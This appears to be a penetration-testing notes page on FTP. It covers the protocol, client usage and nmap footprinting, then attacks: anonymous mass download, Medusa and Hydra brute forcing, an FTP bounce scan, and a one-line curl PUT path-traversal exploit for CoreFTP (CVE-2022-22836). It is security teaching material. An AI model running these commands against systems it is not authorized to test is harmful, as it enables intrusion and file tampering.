Skip to content

exi

21 ftp

The File Transfer Protocol (FTP) is a standard communication protocol used to transfer computer files from a server to a client on a computer network. FTP is built on a client–server model architecture using separate control and data connections between the client and the server. The FTP runs within the application layer of the TCP/IP protocol stack. Thus, it is on the same layer as HTTP or POP.

FTP users may authenticate themselves with a clear-text sign-in protocol, generally in the form of a username and password. However, they can connect anonymously if the server is configured to allow it. For secure transmission that protects the username and password and encrypts the content, FTP is often secured with SSL/TLS (FTPS) or replaced with SSH File Transfer Protocol (SFTP).

However, if the network administrators choose to wrap the connection with the SSL/TLS protocol or tunnel the FTP connection through SSH to add a layer of encryption that only the source and destination hosts can decrypt, this would successfully foil most Man-in-the-Middle attacks.

How it works

The connection

1. First, the client and server establish a control channel through TCP port 21. The client sends commands to the server, and the server returns status codes.

2. Then both communication participants can establish the data channel via TCP port 20. This channel is used exclusively for data transmission, and the protocol watches for errors during this process.

Active and passive FTP

A distinction is made between active and passive FTP. In the active variant, the client establishes the connection as described via TCP port 21 and thus informs the server via which client-side port the server can transmit its responses. However, if a firewall protects the client, the server cannot reply because all external connections are blocked. For this purpose, the passive mode has been developed. Here, the server announces a port through which the client can establish the data channel. Since the client initiates the connection in this method, the firewall does not block the transfer.

Installation

You may need to install ftp service. Run:

sudo apt install ftp -y

Then to connect with ftp, run:

ftp $ip 

The prompt will ask us for the username we want to log in with. Here is where the magic happens. A typical misconfiguration for running FTP services allows an anonymous account to access the service like any other authenticated user. The anonymous username can be input when the prompt appears, followed by any password whatsoever since the service will disregard the password for this specific account.

Basic usage

# Connect with ftp
ftp $ip

# If anonymous login is allowed, enter anonymous as user and press Enter when prompted for password

# Give you a list of available commands
help

# List directories and files
ls

# List recursively. Not always available, only in some configurations
ls -R

# Change to a directory
cd <folder>

# Download a file to your localhost
get <nameofFileInOrigin> <nameOfFileInLocalhost>

# Download multiple files to your localhost
mget *.* <nameOfFileInLocalhost>

# Upload a file from your localhost
put <yourfile>

# Upload multiple files from your localhost
mput *.*

# Exit connection
quit

# Connect in passive mode
ftp -p $ip
# The `-p` flag in the `ftp` command on Linux is used to enable passive mode for the file transfer protocol (FTP) connection. Passive mode is a mode of FTP where the data connection is initiated by the client rather than the server. This can be useful when the client is behind a firewall or NAT (Network Address Translation) that does not allow incoming connections. 

More posibilities with wget:

# Download all available files at once
wget -m --no-passive ftp://anonymous:anonymous@$ip

Footprinting with nmap

1
2
3
4
5
6
7
8
9
# Locate all ftp scripts related
find / -type f -name ftp* 2>/dev/null | grep scripts

# Run a general scanner for version, mode aggresive and perform default scripts
sudo nmap -sV -p21 -sC -A $ip --script-trace
# --script-trace > trace the progress of NSE scripts at the network level
# -sV > version scan 
# -A > aggressive scan 
# -sC > the default script scan

Some nmap scripts related to ftp:

# ftp-anon NSE script checks whether the FTP server allows anonymous access.
# ftp-syst, for example, executes the `STAT` command, which displays information about the FTP server status.

See more about nmap for scanning, running scripts and footprinting

Interact with the service

1
2
3
nc -nv $ip 21
telnet $ip 21
openssl s_client -connect $ip:21 -starttls ftp

Attacking FTP

Anonymous access enabled

# Download all available files at once
wget -m --no-passive ftp://anonymous:anonymous@$ip

Brute forcing with Medusa

Medusa Cheat sheet.

1
2
3
4
5
6
7
8
# Brute force FTP logging
medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h $IP -M ftp
# -u: username
# -U: list of Usernames
# -p: password
# -P: list of passwords
# -h: host /IP
# -M: protocol to bruteforce

However Medusa is very slow in comparison to hydra:

# Example for ftp in a non default port
hydra -L users.txt -P pass.txt ftp://$ip:2121

FTP Bounce Attack

An FTP bounce attack is a network attack that uses FTP servers to deliver outbound traffic to another device on the network. For instance, consider we are targetting an FTP Server FTP_DMZ exposed to the internet. Another device within the same network, Internal_DMZ, is not exposed to the internet. We can use the connection to the FTP_DMZ server to scan Internal_DMZ using the FTP Bounce attack and obtain information about the server's open ports.

nmap -Pn -v -n -p80 -b anonymous:password@$ipFTPdmz $ipINTERNALdmz
# -b The `Nmap` -b flag can be used to perform an FTP bounce attack: 

CoreFTP Server build 725 - Directory Traversal (Authenticated)

CVE-2022-22836 |  exploit

Summary: This FTP service uses an HTTP POST request to upload files. However, the CoreFTP service allows an HTTP PUT request, which we can use to write content to files.

The exploit for this attack is relatively straightforward, based on a single cURL command.

curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops

We create a raw HTTP PUT request (-X PUT) with basic auth (--basic -u <username>:<password>), the path for the file (--path-as-is https://<IP>/../../../../../whoops), and its content (--data-binary "PoC.") with this command. Additionally, we specify the host header (-H "Host: <IP>") with the IP address of our target system.

Other FTP services

TFTP

Trivial File Transfer Protocol (TFTP) is simpler than FTP and performs file transfers between client and server processes.

  • It does not provide user authentication and other valuable features supported by FTP.
  • It uses UDP.
  • It does not require the user's authentication

Because of the lack of security, TFTP, unlike FTP, may only be used in local and protected networks.

Basic usage

# Sets the remote host, and optionally the port, for file transfers.
connect

# Transfers a file or set of files from the remote host to the local host.
get

# Transfers a file or set of files from the local host onto the remote host
put

# Exits tftp
quit

# Shows the current status of tftp, including the current transfer mode (ascii or binary), connection status, time-out value, and so on
status

# Turns verbose mode, which displays additional information during file transfer, on or off.
verbose 

# Unlike the FTP client, TFTP does not have directory listing functionality.

vsFTPd

One of the most used FTP servers on Linux-based distributions is vsFTPd.

Installation

sudo apt install vsftpd 

Configuration file

The default configuration of vsFTPd can be found in /etc/vsftpd.conf.

cat /etc/vsftpd.conf | grep -v "#"
Setting Description
listen=NO Run from inetd or as a standalone daemon?
listen_ipv6=YES Listen on IPv6 ?
anonymous_enable=NO Enable Anonymous access?
local_enable=YES Allow local users to login?
dirmessage_enable=YES Display active directory messages when users go into certain directories?
use_localtime=YES Use local time?
xferlog_enable=YES Activate logging of uploads/downloads?
connect_from_port_20=YES Connect from port 20?
secure_chroot_dir=/var/run/vsftpd/empty Name of an empty directory
pam_service_name=vsftpd This string is the name of the PAM service vsftpd will use.
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem The last three options specify the location of the RSA certificate to use for SSL encrypted connections.
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=NO

In addition, there is a file called /etc/ftpusers that we also need to pay attention to, as this file is used to deny certain users access to the FTP service.

cat /etc/ftpusers

Dangerous settings:

Setting Description
anonymous_enable=YES Allowing anonymous login?
anon_upload_enable=YES Allowing anonymous to upload files?
anon_mkdir_write_enable=YES Allowing anonymous to create new directories?
no_anon_password=YES Do not ask anonymous for password?
anon_root=/home/username/ftp Directory for anonymous.
write_enable=YES Allow the usage of FTP commands: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, and SITE?
Last update: 2024-10-24
Created: January 1, 2023 21:59:36